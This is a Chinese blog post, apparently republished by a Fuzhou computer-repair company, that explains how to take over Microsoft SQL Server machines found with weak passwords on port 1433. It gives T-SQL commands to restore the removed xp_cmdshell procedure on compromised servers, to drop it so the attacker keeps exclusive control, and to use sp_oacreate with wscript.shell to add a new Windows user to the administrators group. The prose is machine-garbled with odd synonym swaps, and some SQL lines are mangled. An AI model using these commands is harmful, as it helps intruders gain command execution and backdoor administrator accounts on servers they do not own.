SQL弱口令1433抓鸡遇到问题
扫到SQL弱口令后使用SQLTOOLS出现未能找到存储历程 ’master..xp_cmdshell’
这种环境的主要原因是删除了扩展存储过历程xp_cmdshell,有一个规复的办法,要是不可功说明被改名了
使用SQLTOOLS毗连,毗连后在使用目录下点执行数据库命令,执行:
EXEC sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’
运气好的话就乐成了,要是你想让你的肉鸡用SQL执行不了DOS命令的话,执行:
sp_dropextendedproc "xp_cmdshell"
就执行不了DOS命令了,固然用下面的语句可以复原。
用SQLTOOLS可以毗连乐成,执行DOS命令,却总是显示这个、、、拒绝了对工具 ’xp_cmdshell’(数据库 ’master’,全部者 ’dbo’)的 EXECUTE 权限。
怎么办理????
上传文件也不可。。。
1 未能找到存储历程’master..xpcmdshell’。
规复方法:盘问分离器毗连后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int,
第二步执行:sp_addextendedproc ’xp_cmdshell’, ’xpsql70.dll’,
然后按F5键命令执行终了。
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)
规复方法:盘问分离器毗连后,
第一步执行:sp_dropextendedproc "xp_cmdshell",
第二步执行:sp_addextendedproc ’xp_cmdshell’, ’xpsql70.dll’
然后按F5键命令执行终了。
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
规复方法:盘问分离器毗连后,
第一步执行:exec sp_dropextendedproc ’xp_cmdshell’
第二步执行:exec sp_addextendedproc ’xp_cmdshell’,’xpweb70.dll’
然后按F5键命令执行终了。
四.终极方法:
要是以上方法均不可规复,请实验用下面的办法间接添加帐户:
盘问分离器毗连后,
2000servser体系:
declare @shell int exec sp_oacreate ’wscript.shell’,@shell output
exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net user 新用户 暗码 /add’
declare @shell int exec sp_oacreate ’wscript.shell’,@shell output exec sp_oamethod
@shell,’run’,null,’c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add’
xp或2003server体系:
declare @shell int exec sp_oacreate ’wscript.shell’,@shell output exec sp_oamethod
@shell,’run’,null,’c:\windows\system32\cmd.exe /c net user 新用户 暗码 /add’
declare @shell int exec sp_oacreate ’wscript.shell’,@shell output exec sp_oamethod
@shell,’run’,null,’c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add’
还不可就没办法了
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
